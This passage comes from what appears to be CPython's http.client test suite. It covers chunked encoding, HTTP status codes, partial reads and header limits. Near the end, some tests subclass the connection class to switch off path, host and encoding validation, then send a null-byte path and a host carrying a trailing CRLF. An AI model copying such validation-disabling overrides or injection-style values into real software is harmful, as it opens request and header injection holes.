headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
            # for testing the handling of empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
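    # Helper: split the raw request bytes captured by the fake socket into
    # (request line, header dict, body). Header lines are split naively on ':',
    # which is sufficient for the simple headers generated in these tests.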
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
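        # Each chunk on the wire looks like b"<hex-size>\r\n<data>\r\n",
        # e.g. b"5\r\nhello\r\n"; a zero-size chunk terminates the body.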
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_dir_with_added_behavior_on_status(self):
# see issue40084
self.assertTrue({'description', 'name', 'phrase', 'value'} <= set(dir(HTTPStatus(404))))
def test_simple_httpstatus(self):
class CheckedHTTPStatus(enum.IntEnum):
"""HTTP status codes and reason phrases
Status codes from the following RFCs are all observed:
* RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616
* RFC 6585: Additional HTTP Status Codes
* RFC 3229: Delta encoding in HTTP
* RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518
* RFC 5842: Binding Extensions to WebDAV
* RFC 7238: Permanent Redirect
* RFC 2295: Transparent Content Negotiation in HTTP
* RFC 2774: An HTTP Extension Framework
* RFC 7725: An HTTP Status Code to Report Legal Obstacles
* RFC 7540: Hypertext Transfer Protocol Version 2 (HTTP/2)
* RFC 2324: Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)
* RFC 8297: An HTTP Status Code for Indicating Hints
* RFC 8470: Using Early Data in HTTP
"""
def __new__(cls, value, phrase, description=''):
obj = int.__new__(cls, value)
obj._value_ = value
obj.phrase = phrase
obj.description = description
return obj
# informational
CONTINUE = 100, 'Continue', 'Request received, please continue'
SWITCHING_PROTOCOLS = (101, 'Switching Protocols',
'Switching to new protocol; obey Upgrade header')
PROCESSING = 102, 'Processing'
EARLY_HINTS = 103, 'Early Hints'
# success
OK = 200, 'OK', 'Request fulfilled, document follows'
CREATED = 201, 'Created', 'Document created, URL follows'
ACCEPTED = (202, 'Accepted',
'Request accepted, processing continues off-line')
NON_AUTHORITATIVE_INFORMATION = (203,
'Non-Authoritative Information', 'Request fulfilled from cache')
NO_CONTENT = 204, 'No Content', 'Request fulfilled, nothing follows'
RESET_CONTENT = 205, 'Reset Content', 'Clear input form for further input'
PARTIAL_CONTENT = 206, 'Partial Content', 'Partial content follows'
MULTI_STATUS = 207, 'Multi-Status'
ALREADY_REPORTED = 208, 'Already Reported'
IM_USED = 226, 'IM Used'
# redirection
MULTIPLE_CHOICES = (300, 'Multiple Choices',
'Object has several resources -- see URI list')
MOVED_PERMANENTLY = (301, 'Moved Permanently',
'Object moved permanently -- see URI list')
FOUND = 302, 'Found', 'Object moved temporarily -- see URI list'
SEE_OTHER = 303, 'See Other', 'Object moved -- see Method and URL list'
NOT_MODIFIED = (304, 'Not Modified',
'Document has not changed since given time')
USE_PROXY = (305, 'Use Proxy',
'You must use proxy specified in Location to access this resource')
TEMPORARY_REDIRECT = (307, 'Temporary Redirect',
'Object moved temporarily -- see URI list')
PERMANENT_REDIRECT = (308, 'Permanent Redirect',
'Object moved permanently -- see URI list')
# client error
BAD_REQUEST = (400, 'Bad Request',
'Bad request syntax or unsupported method')
UNAUTHORIZED = (401, 'Unauthorized',
'No permission -- see authorization schemes')
PAYMENT_REQUIRED = (402, 'Payment Required',
'No payment -- see charging schemes')
FORBIDDEN = (403, 'Forbidden',
'Request forbidden -- authorization will not help')
NOT_FOUND = (404, 'Not Found',
'Nothing matches the given URI')
METHOD_NOT_ALLOWED = (405, 'Method Not Allowed',
'Specified method is invalid for this resource')
NOT_ACCEPTABLE = (406, 'Not Acceptable',
'URI not available in preferred format')
PROXY_AUTHENTICATION_REQUIRED = (407,
'Proxy Authentication Required',
'You must authenticate with this proxy before proceeding')
REQUEST_TIMEOUT = (408, 'Request Timeout',
'Request timed out; try again later')
CONFLICT = 409, 'Conflict', 'Request conflict'
GONE = (410, 'Gone',
'URI no longer exists and has been permanently removed')
LENGTH_REQUIRED = (411, 'Length Required',
'Client must specify Content-Length')
PRECONDITION_FAILED = (412, 'Precondition Failed',
'Precondition in headers is false')
REQUEST_ENTITY_TOO_LARGE = (413, 'Request Entity Too Large',
'Entity is too large')
REQUEST_URI_TOO_LONG = (414, 'Request-URI Too Long',
'URI is too long')
UNSUPPORTED_MEDIA_TYPE = (415, 'Unsupported Media Type',
'Entity body in unsupported format')
REQUESTED_RANGE_NOT_SATISFIABLE = (416,
'Requested Range Not Satisfiable',
'Cannot satisfy request range')
EXPECTATION_FAILED = (417, 'Expectation Failed',
'Expect condition could not be satisfied')
IM_A_TEAPOT = (418, 'I\'m a Teapot',
'Server refuses to brew coffee because it is a teapot.')
MISDIRECTED_REQUEST = (421, 'Misdirected Request',
'Server is not able to produce a response')
UNPROCESSABLE_ENTITY = 422, 'Unprocessable Entity'
LOCKED = 423, 'Locked'
FAILED_DEPENDENCY = 424, 'Failed Dependency'
TOO_EARLY = 425, 'Too Early'
UPGRADE_REQUIRED = 426, 'Upgrade Required'
PRECONDITION_REQUIRED = (428, 'Precondition Required',
'The origin server requires the request to be conditional')
TOO_MANY_REQUESTS = (429, 'Too Many Requests',
'The user has sent too many requests in '
'a given amount of time ("rate limiting")')
REQUEST_HEADER_FIELDS_TOO_LARGE = (431,
'Request Header Fields Too Large',
'The server is unwilling to process the request because its header '
'fields are too large')
UNAVAILABLE_FOR_LEGAL_REASONS = (451,
'Unavailable For Legal Reasons',
'The server is denying access to the '
'resource as a consequence of a legal demand')
# server errors
INTERNAL_SERVER_ERROR = (500, 'Internal Server Error',
'Server got itself in trouble')
NOT_IMPLEMENTED = (501, 'Not Implemented',
'Server does not support this operation')
BAD_GATEWAY = (502, 'Bad Gateway',
'Invalid responses from another server/proxy')
SERVICE_UNAVAILABLE = (503, 'Service Unavailable',
'The server cannot process the request due to a high load')
GATEWAY_TIMEOUT = (504, 'Gateway Timeout',
'The gateway server did not receive a timely response')
HTTP_VERSION_NOT_SUPPORTED = (505, 'HTTP Version Not Supported',
'Cannot fulfill request')
VARIANT_ALSO_NEGOTIATES = 506, 'Variant Also Negotiates'
INSUFFICIENT_STORAGE = 507, 'Insufficient Storage'
LOOP_DETECTED = 508, 'Loop Detected'
NOT_EXTENDED = 510, 'Not Extended'
NETWORK_AUTHENTICATION_REQUIRED = (511,
'Network Authentication Required',
'The client needs to authenticate to gain network access')
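        # enum._test_simple_enum() (a private test helper) checks that this
        # hand-written mirror matches the real http.HTTPStatus member for member.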
enum._test_simple_enum(CheckedHTTPStatus, HTTPStatus)
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_past_end(self):
# if we have Content-Length, clip reads to the end
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(10), b'Text')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_past_end(self):
# if we have Content-Length, clip readintos to the end
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(10)
n = resp.readinto(b)
self.assertEqual(n, 4)
self.assertEqual(bytes(b)[:4], b'Text')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
        # Test HTTPResponse behaviour when the status line has no \r\n termination.
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.create_server((HOST, 0))
self.addCleanup(serv.close)
result = None
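        # Minimal in-process server: consume the request headers, answer the
        # CONNECT with "200 Connection established", then capture whatever the
        # client pushes through the tunnelled file descriptor.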
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
